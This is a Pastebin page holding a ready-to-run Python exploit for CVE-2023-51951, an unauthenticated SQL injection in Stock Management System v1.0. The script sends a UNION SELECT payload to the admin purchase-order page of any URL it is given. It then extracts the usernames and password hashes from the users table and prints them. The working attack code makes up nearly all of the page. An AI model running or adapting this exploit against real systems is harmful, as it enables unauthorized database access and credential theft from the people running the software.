API tools faq
paste
Advertisement
FlyFar

Stock Management System v1.0 - Unauthenticated SQL Injection - CVE-2023-51951

FlyFar
Apr 18th, 2024
852
1
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.55 KB | Cybersecurity | 1 0
raw download clone embed print report
  1. # Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection
  2. # Date: February 6, 2024
  3. # Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group
  4. # Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html
  5. # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip
  6. # Tested on: Linux and Windows, XAMPP
  7. # CVE-2023-51951
  8. # Vendor: oretnom23
  9. # Version: v1.0
  10. # Exploit Description:
  11. #   The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack.
  12.  
  13. import requests
  14. from bs4 import BeautifulSoup
  15. import argparse
  16.  
  17. def print_header():
  18.     print("\033[1m\nStock Management System v1.0\033[0m")
  19.     print("\033[1mSQL Injection Exploit\033[0m")
  20.     print("\033[96mby blu3ming\n\033[0m")
  21.  
  22. def parse_response(target_url):
  23.     try:
  24.         target_response = requests.get(target_url)
  25.         soup = BeautifulSoup(target_response.text, 'html.parser')
  26.         textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text
  27.  
  28.         # Split the text using ',' as a delimiter
  29.         users = textarea_text.split(',')
  30.         for user in users:
  31.             # Split username and password using ':' as a delimiter
  32.             username, password = user.split(':')
  33.             print("| {:<20} | {:<40} |".format(username, password))
  34.     except:
  35.         print("No data could be retrieved. Try again.")
  36.  
  37. def retrieve_data(base_url):
  38.     target_path = '/sms/admin/?page=purchase_order/manage_po&id='
  39.     payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-"
  40.  
  41.     #Dump users table
  42.     target_url = base_url + target_path + payload
  43.     print("+----------------------+------------------------------------------+")
  44.     print("| {:<20} | {:<40} |".format("username", "password"))
  45.     print("+----------------------+------------------------------------------+")
  46.     parse_response(target_url)
  47.     print("+----------------------+------------------------------------------+\n")
  48.  
  49. if __name__ == "__main__":
  50.     about  = 'Unauthenticated SQL Injection Exploit - Stock Management System'
  51.     parser = argparse.ArgumentParser(description=about)
  52.     parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL')
  53.     args = parser.parse_args()
  54.     print_header()
  55.     retrieve_data(args.base_url)
  56.            
Tags: Exploit sql Vulnerability sql injection injection
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!